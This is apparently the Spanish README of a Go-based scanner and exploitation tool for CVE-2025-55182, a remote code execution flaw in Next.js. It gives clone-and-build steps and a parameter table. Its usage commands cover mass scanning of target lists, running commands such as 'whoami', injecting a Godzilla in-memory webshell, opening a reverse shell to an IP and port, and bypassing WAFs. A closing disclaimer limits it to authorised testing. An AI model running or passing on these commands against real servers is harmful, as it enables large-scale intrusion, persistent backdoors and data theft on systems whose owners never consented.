Escáner y herramienta de explotación basados en Go para CVE-2025-55182 (RCE en Next.js). Admite escaneo por lotes, ejecución de comandos, inyección de shell de memoria Godzilla, shell inversa y evasión de WAF.
Herramienta de escaneo y explotación de CVE-2025-55182, para la vulnerabilidad de ejecución remota de código en aplicaciones Next.js. Admite detección por lotes, ejecución de comandos, inyección de Godzilla Memory Horse y funcionalidad de reverse shell.
⚠️ Esta herramienta es solo para investigación de seguridad y pruebas autorizadas. No la utilice con fines ilegales.
.txt.success.json, y opcionalmente escribe las URL vulnerables en un archivo específico.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
| Parámetro | Tipo | Valor predeterminado | Descripción |
|---|---|---|---|
-u | string | Ninguno | URL de un solo objetivo (ej. http://example.com:3000) |
-f | string | Ninguno | Archivo que contiene una lista de URLs (una por línea) |
-d | string | Ninguno | Carpeta que contiene múltiples archivos .txt |
-o | string | Ninguno | Archivo de salida (guarda las URLs vulnerables, una por línea) |
-t | int | 10 | Número de hilos concurrentes |
-to | int | 10 | Tiempo de espera de solicitud (segundos) |
-c | string | Ninguno | Comando a ejecutar (ej. id) |
-m | string | Ninguno | Modo: waf (habilitar bypass de WAF) |
-p | string | Ninguno | Proxy HTTP (ej. http://127.0.0.1:8080) |
-g | bool | false | Habilitar inyección de Godzilla Memory Horse |
-rs | string | Ninguno | Dirección de reverse shell (formato IP:PORT) |
-dv | bool | false | Modo detallado (imprime el proceso de escaneo para cada URL) |
-es | bool | false | Modo de escaneo de información sensible |
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
Tras una inyección exitosa, la herramienta muestra la dirección de conexión, contraseña, clave y cabecera de solicitud de Godzilla.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: guarda automáticamente los detalles de todos los objetivos explotados con éxito (incluye salida de comandos, configuración de Godzilla, etc.).-o: guarda la lista de URLs vulnerables (una por línea).Durante el escaneo se muestra una barra de progreso en tiempo real y las vulnerabilidades descubiertas; al final se imprime un resumen estadístico.
-p.-to.Esta herramienta está destinada únicamente a la investigación de seguridad y a pruebas autorizadas. El usuario asume toda la responsabilidad legal. El desarrollador no se hace responsable de ningún uso indebido.